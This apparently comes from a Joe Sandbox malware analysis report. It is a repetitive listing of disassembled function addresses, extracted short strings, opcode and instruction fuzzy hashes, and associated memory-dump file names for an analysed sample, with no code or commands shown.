Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID:
String ID: WGu
API String ID: 0-3724240178
Opcode ID: 4f16f49636de8b4db66943dbb24a463b63a59e1cc7fe536bf08842a907b695d8
Instruction ID: f853e0828ec9165fb504c4c517d5ae417020a3bc37c66ce625e4cf505a446aac
Opcode Fuzzy Hash: 4f16f49636de8b4db66943dbb24a463b63a59e1cc7fe536bf08842a907b695d8
Instruction Fuzzy Hash: 77F1E0B3F546244BF3505D29DC883A27A82EB94720F2F823D9E989B7C4ED7E9C055385

Function 00F941BC Relevance: 1.7, Strings: 1, Instructions: 405COMMON

Download Yara Rule

Strings

\<l7, xrefs: 00F9459C

Memory Dump Source

Source File: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID:
String ID: \<l7
API String ID: 0-4229689942
Opcode ID: b1c9c4cd2d8110030f325968b8b7e4fa2813a03e099dc1654a454d397039376e
Instruction ID: 26882dab514796ab10c8dc0c053656c368d1aa72fa45f5ef46d2fe6447490937
Opcode Fuzzy Hash: b1c9c4cd2d8110030f325968b8b7e4fa2813a03e099dc1654a454d397039376e
Instruction Fuzzy Hash: E1D1F4F3F152144BF3449E28DC887A6BBD3EBD4310F2B853D9A8897784EA7A5C058785

Function 00ED7190 Relevance: 1.6, Strings: 1, Instructions: 375COMMON

Download Yara Rule

Strings

Ru, xrefs: 00ED7542

Memory Dump Source

Source File: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID:
String ID: Ru
API String ID: 0-2888028611
Opcode ID: f5040d8a820fa07382c49021b6f2fa448ab0347ef14dcc4c12522ff9f20a7018
Instruction ID: 2e9db5a2ae8b9515d84bd0cd2d919d3fc39db59b378a231f41293847ad314c5a
Opcode Fuzzy Hash: f5040d8a820fa07382c49021b6f2fa448ab0347ef14dcc4c12522ff9f20a7018
Instruction Fuzzy Hash: 78B10E70208701CFE7258F29D851B72BBE2FB46304F18999DD4D69B3A2E734E842DB60

Function 0104311D Relevance: 1.5, Strings: 1, Instructions: 298COMMON

Download Yara Rule

Strings

pEB@, xrefs: 01043294

Memory Dump Source

Source File: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID:
String ID: pEB@
API String ID: 0-2293849276
Opcode ID: e97fe23b368df344dc829081d19ef21297859bc25e2ea8d09f99873d69343763
Instruction ID: 42866de5f91e8f120dc82156306a63c97d857bf2078ec2f765f75f4084bcc1a0
Opcode Fuzzy Hash: e97fe23b368df344dc829081d19ef21297859bc25e2ea8d09f99873d69343763
Instruction Fuzzy Hash: 35A189B3F506210BF3584879CC983A26583DBD5311F2F82388F896B7C9D9BE5D4A5384

Function 00EF01D0 Relevance: 1.5, Strings: 1, Instructions: 285COMMON

Download Yara Rule

Strings

0, xrefs: 00EF0251

Memory Dump Source

Source File: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: bb06390ba30257de28ce10919db3bc651dc95838fe7d4853d5532943ac75682c
Instruction ID: 9e80673a8f58f4748edb5690390bbb7c86c0cbc747a289cf1f0dc2034a2c514c
Opcode Fuzzy Hash: bb06390ba30257de28ce10919db3bc651dc95838fe7d4853d5532943ac75682c
Instruction Fuzzy Hash: E6915B33719A9447C72C5D7C0C652BA7A834BD6330F2E936EB6B2DB3E3D91988055350

Function 00F9A24E Relevance: 1.5, Strings: 1, Instructions: 277COMMON

Download Yara Rule

Strings

G0G5, xrefs: 00F9A279

Memory Dump Source

Source File: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID:
String ID: G0G5
API String ID: 0-3932637161
Opcode ID: 3a689820934ca25c9e2711d29be7c08ba87bd4b694a02d29f429d3c658274db3
Instruction ID: 15b150f6ca1dc25b28296d41505ea7ccea66b86118e41101db4cf17b7950fb29
Opcode Fuzzy Hash: 3a689820934ca25c9e2711d29be7c08ba87bd4b694a02d29f429d3c658274db3
Instruction Fuzzy Hash: B1A1ADB3F5162547F3544C28CC983A27282EB94314F2F81788E88AB7C5E9BE9D4A53C4

Function 00FCE574 Relevance: 1.5, Strings: 1, Instructions: 275COMMON

Download Yara Rule

Strings

[, xrefs: 00FCE635

Memory Dump Source

Source File: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID:
String ID: [
API String ID: 0-784033777
Opcode ID: 1cd1b57a4f19c95610cdc0667557703579106911d62d9df75c72f1c8a237f350
Instruction ID: 50f5916c0ced33d8098907dcaad9761289012a17dbc53b580fea8ec82f05c98d
Opcode Fuzzy Hash: 1cd1b57a4f19c95610cdc0667557703579106911d62d9df75c72f1c8a237f350
Instruction Fuzzy Hash: 4291BEB3F116214BF3544D68CD583A2B683DB95325F2F82788E486BBC9D97E9C0A53C4

Function 0104E33C Relevance: 1.5, Strings: 1, Instructions: 273COMMON

Download Yara Rule

Strings

D, xrefs: 0104E419

Memory Dump Source

Source File: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID:
String ID: D
API String ID: 0-2746444292
Opcode ID: 32b1ad8e28a85df1bcaa5358b886ce4ab889e9593b3241ae7229de206bb311b9
Instruction ID: 68e1aa62c84355b1e6b3dad7cbfce5aa92d45b2e9d756470df9041d676c7547d
Opcode Fuzzy Hash: 32b1ad8e28a85df1bcaa5358b886ce4ab889e9593b3241ae7229de206bb311b9
Instruction Fuzzy Hash: 3C91ACB3F2152547F3544978CD683B26582EB91321F2F833C8E99ABBC8DC7E5D0A5284

Function 00FE02E0 Relevance: 1.5, Strings: 1, Instructions: 271COMMON

Download Yara Rule

Strings

[$4[, xrefs: 00FE0602

Memory Dump Source

Source File: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID:
String ID: [$4[
API String ID: 0-1168097800
Opcode ID: 2ad4d7c20eef19588639af5a7fc61668d83957dbe2c3f3ec7eb1d5d09344196b
Instruction ID: 7af0b53f117ccc31b9afb1e731e833f2d5e2081e6669c2395fb1c85c1598a8f4
Opcode Fuzzy Hash: 2ad4d7c20eef19588639af5a7fc61668d83957dbe2c3f3ec7eb1d5d09344196b
Instruction Fuzzy Hash: A19196B3F116254BF3980829CC683A22683ABD1314F2F827C8F896B7C5DC7E5D4A5384

Function 00FFC243 Relevance: 1.5, Strings: 1, Instructions: 260COMMON

Download Yara Rule

Strings

p, xrefs: 00FFC32B

Memory Dump Source

Source File: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID:
String ID: p
API String ID: 0-2181537457
Opcode ID: c40677c0c950d6cf25735cc95cb7142b418f3881c1ae1da854f1594003b15c13
Instruction ID: 7e8f4ccfd557d561af176117ee8456f0415289c196d1b0eec7e2cfdf60a511cc
Opcode Fuzzy Hash: c40677c0c950d6cf25735cc95cb7142b418f3881c1ae1da854f1594003b15c13
Instruction Fuzzy Hash: 7791ADB7F1112547F3444929CC583A27293EBD5315F2F81788E48ABBC9D97EAD0A93C4

Function 00EFA030 Relevance: 1.5, Strings: 1, Instructions: 254COMMON

Download Yara Rule

Strings

cba`, xrefs: 00EFA1DF

Memory Dump Source

Source File: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID: InitializeThunk
String ID: cba`
API String ID: 2994545307-1926275841
Opcode ID: 73aaf1044cdfe1d39162a7f61d9267a04376dcc8b9c3d02c97154d4e6e823997
Instruction ID: ede5180162ba06a8a0337e9b8208246be14c636a514871a9ebe9418cc3c9dcb9
Opcode Fuzzy Hash: 73aaf1044cdfe1d39162a7f61d9267a04376dcc8b9c3d02c97154d4e6e823997
Instruction Fuzzy Hash: A77138B1B093085FE7189E28D89067AB7E2EB85314F1D553CD69B9B6A1EB319800CB52

Function 00FA25A1 Relevance: 1.5, Strings: 1, Instructions: 248COMMON

Download Yara Rule

Strings

ahg, xrefs: 00FA27AC

Memory Dump Source

Source File: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID:
String ID: ahg
API String ID: 0-779338140
Opcode ID: aeea86c16e57587244a3bb8d6c21e0109e43960c2f449cd0ccce0a8313d40dd3
Instruction ID: fc3c118334ebbd31a282bf0923fbf5cf2cf89ac2a0e4b26394e08d553cef5f2d
Opcode Fuzzy Hash: aeea86c16e57587244a3bb8d6c21e0109e43960c2f449cd0ccce0a8313d40dd3
Instruction Fuzzy Hash: 8D81AEB3F1122547F3444D68CC983A27693EB95320F2F81788E986B7C5DE7E6D0A9784

Function 00FB0595 Relevance: 1.5, Strings: 1, Instructions: 246COMMON

Download Yara Rule

Strings

<, xrefs: 00FB066E

Memory Dump Source

Source File: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID:
String ID: <
API String ID: 0-4251816714
Opcode ID: 3639b6eb5ffcd0a28f5fefafaf7d8ac32954ecedabd7dadb1b6297f3ea9371f0
Instruction ID: 6b0c9b5853e133cb579b710ec2b1db76b72103cdadd3eab8372c6ffca6aa57d4
Opcode Fuzzy Hash: 3639b6eb5ffcd0a28f5fefafaf7d8ac32954ecedabd7dadb1b6297f3ea9371f0
Instruction Fuzzy Hash: D3816DB3F1162547F3544929CC583A27283ABD5321F2F81788E8C6B7C9ED7E9D465384

Function 00EEA100 Relevance: 1.5, Strings: 1, Instructions: 241COMMON

Download Yara Rule

Strings

", xrefs: 00EEA346

Memory Dump Source

Source File: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 1bde58d3ad00dbcf7b211c85afe0c87ae7ec8536041c5ee7d742fbdcfbaf8b1e
Instruction ID: 27cd30527c88f9ef23a867cda946843b1fb04ab69a6e71577c7189dbd20a5e6f
Opcode Fuzzy Hash: 1bde58d3ad00dbcf7b211c85afe0c87ae7ec8536041c5ee7d742fbdcfbaf8b1e
Instruction Fuzzy Hash: 1A71F9727097994BD724996E8C8025EB6C35BC6334F1DE73CE8B5AB3E5E670AC054382

Function 00F4C2DD Relevance: 1.5, Strings: 1, Instructions: 228COMMON

Download Yara Rule

Strings

#, xrefs: 00F4C4AC

Memory Dump Source

Source File: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
